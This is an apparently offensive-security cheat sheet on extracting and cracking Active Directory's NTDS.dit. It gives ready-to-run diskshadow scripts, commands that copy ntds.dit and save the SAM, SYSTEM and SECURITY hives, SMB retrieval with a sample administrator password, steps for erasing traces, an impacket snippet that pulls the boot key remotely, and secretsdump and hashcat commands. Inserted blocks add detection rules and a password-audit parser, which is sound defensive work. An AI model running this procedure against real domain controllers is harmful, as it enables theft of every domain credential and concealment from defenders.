# NTDS

* <https://trustedsec.com/blog/exploring-ntds-dit-part-1-cracking-the-surface-with-dit-explorer>

## Shadow Disk

### Create via Diskshadow

Locate `diskshadow.exe`:

```
cmd /c where /R C:\ diskshadow.exe
```

Create a shadow disk:

```
cd \Windows\Temp
powershell -c "Add-Content add_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content add_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content add_vol.txt 'set verbose on'"
powershell -c "Add-Content add_vol.txt 'begin backup'"
powershell -c "Add-Content add_vol.txt 'add volume c: alias DCROOT'"
powershell -c "Add-Content add_vol.txt 'create'"
powershell -c "Add-Content add_vol.txt 'expose %DCROOT% w:'"
powershell -c "Add-Content add_vol.txt 'end backup'"
cmd /c diskshadow.exe /s add_vol.txt
```

{% code title="add\_vol.txt" %}

```
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
begin backup
add volume c: alias DCROOT
create
expose %DCROOT% w:
end backup
```

{% endcode %}

### Exfiltrate over SMB

Stage everything we need in a directory reachable over SMB (here `C:\Windows\Temp`, fetched afterwards through the administrative `C$` share):

```
cd \Windows\Temp
copy w:\Windows\NTDS\ntds.dit ntds.dit
cmd /c reg.exe save hklm\system system.hive
cmd /c reg.exe save hklm\sam sam.hive
cmd /c reg.exe save hklm\security security.hive
```

Connect to the share and grab the files:

```
$ smbclient.py MEGACORP/administrator:'Passw0rd!'@192.168.1.11
use C$
cd windows/temp
get ntds.dit
get system.hive
get sam.hive
get security.hive
```

### Clean Up

Remove the shadow volume:

```
cd \Windows\Temp
powershell -c "Add-Content delete_vol.txt 'set context persistent nowriters'"
powershell -c "Add-Content delete_vol.txt 'set metadata C:\Windows\Temp\meta.cab'"
powershell -c "Add-Content delete_vol.txt 'set verbose on'"
powershell -c "Add-Content delete_vol.txt 'unexpose w:'"
powershell -c "Add-Content delete_vol.txt 'delete shadows volume c:'"
powershell -c "Add-Content delete_vol.txt 'reset'"
cmd /c diskshadow.exe /s delete_vol.txt
```

{% code title="delete\_vol.txt" %}

```
set context persistent nowriters
set metadata C:\Windows\Temp\meta.cab
set verbose on
unexpose w:
delete shadows volume c:
reset
```

{% endcode %}

Remove the staged files and all other traces:

```
cd \Windows\Temp
rm ntds.dit
rm system.hive
rm sam.hive
rm security.hive
rm C:\Windows\Temp\meta.cab
rm add_vol.txt
rm delete_vol.txt
```
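Detection logic for the chain above, written as an added example (it is not part of the original page): a small rule set that flags the indicators this procedure leaves in process-creation telemetry (`diskshadow.exe /s <script>`, `reg.exe save` of the SAM/SYSTEM/SECURITY hives, `ntds.dit` or a `HarddiskVolumeShadowCopy` path on a command line, and the `esentutl /p` repair used later on this page), then correlates them per host so that one lone `reg.exe save` from a backup job does not page anyone while several stages on the same host do. The event layout (`host`, `Image`, `CommandLine`, as Sysmon Event ID 1 or Windows 4688 would give after JSON conversion) and the sample events are assumptions constructed for the example.

```python
"""Added example (not from the original page): detection rules for the
shadow-copy NTDS.dit extraction chain, run over constructed process-creation
events. Field names mirror Sysmon Event ID 1 / Windows 4688 after JSON
conversion; the events below are hand-written samples, not real telemetry."""
import re
from collections import defaultdict

# Indicators taken from the commands on this page. Each rule is a name plus a
# regex applied case-insensitively to the full command line.
RULES = [
    ("diskshadow_script", re.compile(r"\bdiskshadow(\.exe)?\b.*\s/s(\s|$)", re.I)),
    ("vssadmin_create_shadow", re.compile(r"\bvssadmin(\.exe)?\b.*\bcreate\s+shadow\b", re.I)),
    ("reg_save_hive", re.compile(
        r"\breg(\.exe)?\s+save\s+(hklm|hkey_local_machine)\\(sam|system|security)\b", re.I)),
    ("esentutl_on_ntds", re.compile(r"\besentutl(\.exe)?\b.*ntds\.dit", re.I)),
    ("ntds_dit_on_cmdline", re.compile(r"ntds\.dit", re.I)),
    ("shadow_copy_path", re.compile(r"harddiskvolumeshadowcopy\d+", re.I)),
]


def classify(event):
    """Return the names of all rules matching one event, in RULES order."""
    cmdline = event.get("CommandLine", "")
    return [name for name, rx in RULES if rx.search(cmdline)]


def hits_per_host(events):
    """Collect the distinct rule names that fired on each host (sorted)."""
    seen = defaultdict(set)
    for ev in events:
        for name in classify(ev):
            seen[ev["host"]].add(name)
    return {host: sorted(names) for host, names in seen.items()}


def suspicious_hosts(events, min_rules=2):
    """Hosts where at least `min_rules` distinct indicators fired. A single
    reg.exe save or a lone ntds.dit mention can be legitimate backup activity;
    several stages of the chain on one host is what warrants a closer look."""
    return {h: n for h, n in hits_per_host(events).items() if len(n) >= min_rules}


# Constructed sample events: the chain from this page on DC01 plus benign noise.
SAMPLE_EVENTS = [
    {"host": "DC01", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c where /R C:\ diskshadow.exe"},
    {"host": "DC01", "Image": r"C:\Windows\System32\diskshadow.exe",
     "CommandLine": r"diskshadow.exe /s add_vol.txt"},
    {"host": "DC01", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe save hklm\system system.hive"},
    {"host": "DC01", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c copy w:\Windows\NTDS\ntds.dit ntds.dit"},
    {"host": "DC01", "Image": r"C:\Windows\System32\esentutl.exe",
     "CommandLine": r'esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o'},
    {"host": "FS02", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion"},
    {"host": "WS07", "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"svchost.exe -k netsvcs -p -s Schedule"},
]

if __name__ == "__main__":
    for host, names in suspicious_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(names)}")
```

Note that the `where /R C:\ diskshadow.exe` reconnaissance step deliberately does not match `diskshadow_script`: only an actual `/s <script>` invocation does, and the script file itself (`add_vol.txt` in `C:\Windows\Temp`) is a second artefact worth collecting when the rule fires.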

## Raw NTDS.dit Copy

* <https://github.com/3gstudent/ntfsDump>
* <https://github.com/RedCursorSecurityConsulting/NTFSCopy>

Obtain a copy of NTDS.dit:

```
PS > Invoke-NTFSCopy C:\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
```

Parse on-site in conjunction with [NtdsAudit](https://github.com/dionach/NtdsAudit/releases):

```
PS > esentutl.exe /p "C:\Windows\Temp\ntds.dit" /!10240 /8 /o
PS > reg.exe save HKLM\SYSTEM system.hive
PS > .\NtdsAudit.exe ntds.dit -s system.hive -p hashes.txt -u users.csv --dump-reversible cleartext.txt
```

Parse on-site in conjunction with [secretsdump.exe](https://github.com/Qazeer/OffensivePythonPipeline/blob/main/binaries/impacket/secretsdump_windows.exe) (the snippet below fetches the boot key from the DC remotely with impacket so it can be passed to `secretsdump.exe LOCAL -bootkey`):

```python
from binascii import hexlify
from impacket.smbconnection import SMBConnection
from impacket.examples.secretsdump import RemoteOperations

hostname = 'DC01.megacorp.local'
username = 'snovvcrash'
password = '<PASSWORD>'
nthash = '' if password else '<NTHASH>'  # pass-the-hash if no password is set
domain = hostname.split('.', 1)[1]  # derive the domain from the DC's FQDN

# Authenticate over SMB and use the remote registry to derive the boot key
smbConn = SMBConnection(remoteName=hostname, remoteHost=hostname)
smbConn.login(user=username, password=password, domain=domain, nthash=nthash)
remOps = RemoteOperations(smbConnection=smbConn, doKerberos=False)
remOps.enableRegistry()  # starts the RemoteRegistry service if needed
bootKey = remOps.getBootKey()  # SYSTEM hive boot key, needed to decrypt the PEK
print(hexlify(bootKey).decode())
remOps.finish()  # restore the RemoteRegistry service state and close
# .\secretsdump.exe LOCAL -ntds C:\Windows\Temp\ntds.dit -bootkey <BOOTKEY>
```

## Parse NTDS.dit

Parse with [secretsdump.py](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py):

```
$ secretsdump.py [-pwd-last-set] [-user-status] [-history] -sam sam.hive -system system.hive -security security.hive -ntds ntds.dit LOCAL > ntds.txt
$ cat ntds.txt | grep -a aad3b | grep -i 'Status=Enabled' | grep -v 31d6c | grep -v -e '\$' -e '{' -e '}' -e HealthMailbox | awk -F: '{print $1":"$4}' | sort -u > ntds.in
$ hashcat -m 1000 -a 0 -w 3 -O --session=ntds -o ntds.out ntds.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule
```
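The `grep`/`awk` pipeline above selects enabled, non-empty user hashes for cracking; a defender running the same dump as a password audit wants the opposite view of the same data. The block below is an added example, not the page's own code nor part of impacket: it parses the `domain\user:rid:lmhash:nthash:::` lines (with the `(status=...)` suffix that `-user-status` appends), ignores history rows and machine accounts, and reports enabled accounts with an empty password, accounts that still store an LM hash, and NT hashes shared across accounts (password reuse). The dump text is constructed; apart from the two well-known empty-password hashes, every hash is a placeholder.

```python
"""Added example (not from the original page or from impacket): audit pass
over secretsdump.py NTDS output. The dump below is constructed; only the two
empty-password constants are real hash values."""
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty/absent password
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty password

# domain\user:rid:lmhash:nthash::: followed by optional annotations such as
# " (pwdLastSet=...)" and " (status=Enabled)" from -pwd-last-set / -user-status
HASH_LINE = re.compile(
    r"^(?P<account>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::(?P<rest>.*)$",
    re.I,
)


def parse_secretsdump(text):
    """Turn the hash lines of a dump into dicts; banner and progress lines are skipped."""
    accounts = []
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if not m:
            continue
        status = re.search(r"status=(\w+)", m["rest"], re.I)
        accounts.append({
            "account": m["account"],
            "rid": int(m["rid"]),
            "lm": m["lm"].lower(),
            "nt": m["nt"].lower(),
            # None when the dump was taken without -user-status
            "enabled": None if status is None else status[1].lower() == "enabled",
            "history": "_history" in m["account"],   # rows produced by -history
            "machine": m["account"].endswith("$"),   # computer accounts
        })
    return accounts


def audit(accounts):
    """Findings a defender cares about, ignoring history rows and machine accounts."""
    current = [a for a in accounts if not a["history"] and not a["machine"]]
    by_nt = defaultdict(list)
    for a in current:
        by_nt[a["nt"]].append(a["account"])
    return {
        # enabled accounts whose NT hash is the hash of the empty password
        "enabled_empty_password": sorted(
            a["account"] for a in current if a["enabled"] and a["nt"] == EMPTY_NT),
        # accounts that still carry a real LM hash (LM storage not disabled)
        "lm_hash_present": sorted(a["account"] for a in current if a["lm"] != EMPTY_LM),
        # identical NT hash across accounts means the same password is in use
        "shared_passwords": {nt: sorted(names) for nt, names in by_nt.items()
                             if len(names) > 1 and nt != EMPTY_NT},
    }


# Constructed sample dump in secretsdump.py's output format (placeholder hashes)
SAMPLE_DUMP = r"""
[*] Target system bootKey: 0x00000000000000000000000000000000
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:22222222222222222222222222222222::: (status=Disabled)
MEGACORP\j.doe:1105:aad3b435b51404eeaad3b435b51404ee:11111111111111111111111111111111::: (status=Enabled)
MEGACORP\svc_backup:1106:33333333333333333333333333333333:44444444444444444444444444444444::: (status=Enabled)
MEGACORP\t.temp:1107:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Enabled)
MEGACORP\j.doe_history0:1105:aad3b435b51404eeaad3b435b51404ee:55555555555555555555555555555555::: (status=Enabled)
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66666666666666666666666666666666::: (status=Enabled)
[*] Cleaning up...
"""

if __name__ == "__main__":
    for finding, value in audit(parse_secretsdump(SAMPLE_DUMP)).items():
        print(f"{finding}: {value}")
```

The `enabled` field is only populated when the dump was produced with `-user-status`; without it the empty-password check cannot distinguish a disabled Guest from a live account, which is why the page's pipeline filters on `Status=Enabled` in the first place.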

Parse with [aesedb](https://github.com/skelsec/aesedb) (faster but less informative):

```
$ antdsparse <BOOTKEY> ntds.dit -o ntds.txt --progress
$ antdsparse system.hive ntds.dit -o ntds.txt --progress
```

Parse with ntdissector:

* <https://www.synacktiv.com/publications/introducing-ntdissector-a-swiss-army-knife-for-your-ntdsdit-files>
* <https://github.com/synacktiv/ntdissector>

### Reversible Encryption

* <https://adsecurity.org/?p=2053>
* <https://www.blackhillsinfosec.com/how-i-cracked-a-128-bit-password/>

Check if enabled globally:

* gpmc.msc > Default Domain Policy > *Computer Configuration* > *Policies* > *Windows Settings* > *Security Settings* > *Account Policies* > *Password Policy* > *Store passwords using reversible encryption* > *Enabled* ✔

Check if enabled for specific users:

```
PS > Get-ADUser -Filter {userAccountControl -band 128} -Properties userAccountControl | ft name,samAccountName,userAccountControl | tee users-revenc.txt
```

{% hint style="info" %}
When DCSyncing such users, a cleartext password will be obtained.
{% endhint %}
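The `-band 128` test above checks a single bit of `userAccountControl`; the block below is an added example (not from the original page) that decodes the whole attribute, reproduces that filter over constructed user records, generalises it to any flag, and produces the equivalent LDAP filter using the bitwise-AND matching rule OID. The flag values are the documented Active Directory `userAccountControl` bits; the user records are made up.

```python
"""Added example (not from the original page): decoding userAccountControl and
reproducing the `Get-ADUser -Filter {userAccountControl -band 128}` check over
constructed user records, plus the equivalent LDAP filter."""

# Documented userAccountControl bit values (subset of the full list)
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0040: "PASSWD_CANT_CHANGE",
    0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",  # reversible encryption, the bit tested above
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
ENCRYPTED_TEXT_PWD_ALLOWED = 0x0080
# LDAP_MATCHING_RULE_BIT_AND: expresses "attribute & mask != 0" in an LDAP filter
LDAP_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value):
    """Names of all set bits, lowest bit first; bits outside the table are reported as hex."""
    names = [UAC_FLAGS[bit] for bit in sorted(UAC_FLAGS) if value & bit]
    known = 0
    for bit in UAC_FLAGS:
        known |= bit
    leftover = value & ~known
    if leftover:
        names.append(f"UNKNOWN_0x{leftover:x}")
    return names


def has_flag(value, flag):
    """The -band test: true when the flag's bit is set in the attribute."""
    return bool(value & flag)


def find_with_flag(users, flag=ENCRYPTED_TEXT_PWD_ALLOWED):
    """sAMAccountNames whose userAccountControl has `flag` set (default: reversible encryption)."""
    return [u["samAccountName"] for u in users if has_flag(u["userAccountControl"], flag)]


def ldap_filter_for_flag(flag, attribute="userAccountControl"):
    """Same test as an LDAP filter, usable from any LDAP client instead of Get-ADUser."""
    return f"({attribute}:{LDAP_BIT_AND}:={flag})"


# Constructed user records mirroring the columns of the Get-ADUser one-liner
SAMPLE_USERS = [
    {"name": "Jane Doe", "samAccountName": "j.doe", "userAccountControl": 512},
    {"name": "Legacy Service", "samAccountName": "svc_legacy", "userAccountControl": 66176},
    {"name": "Mail Gateway", "samAccountName": "svc_mail", "userAccountControl": 640},
    {"name": "Temp Account", "samAccountName": "t.temp", "userAccountControl": 514},
]

if __name__ == "__main__":
    for u in SAMPLE_USERS:
        print(f"{u['samAccountName']:<12} {u['userAccountControl']:>8}  {', '.join(decode_uac(u['userAccountControl']))}")
    print("reversible encryption:", find_with_flag(SAMPLE_USERS))
    print("LDAP filter:", ldap_filter_for_flag(ENCRYPTED_TEXT_PWD_ALLOWED))
```

Decoding the full attribute matters because the reversible-encryption bit usually travels with others worth knowing about on the same account (a non-expiring password in `svc_legacy` above, for instance), and the LDAP form lets the same check be scheduled from a non-Windows monitoring host.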

## Tools

* <https://github.com/dionach/NtdsAudit>
* <https://github.com/MichaelGrafnetter/DSInternals>
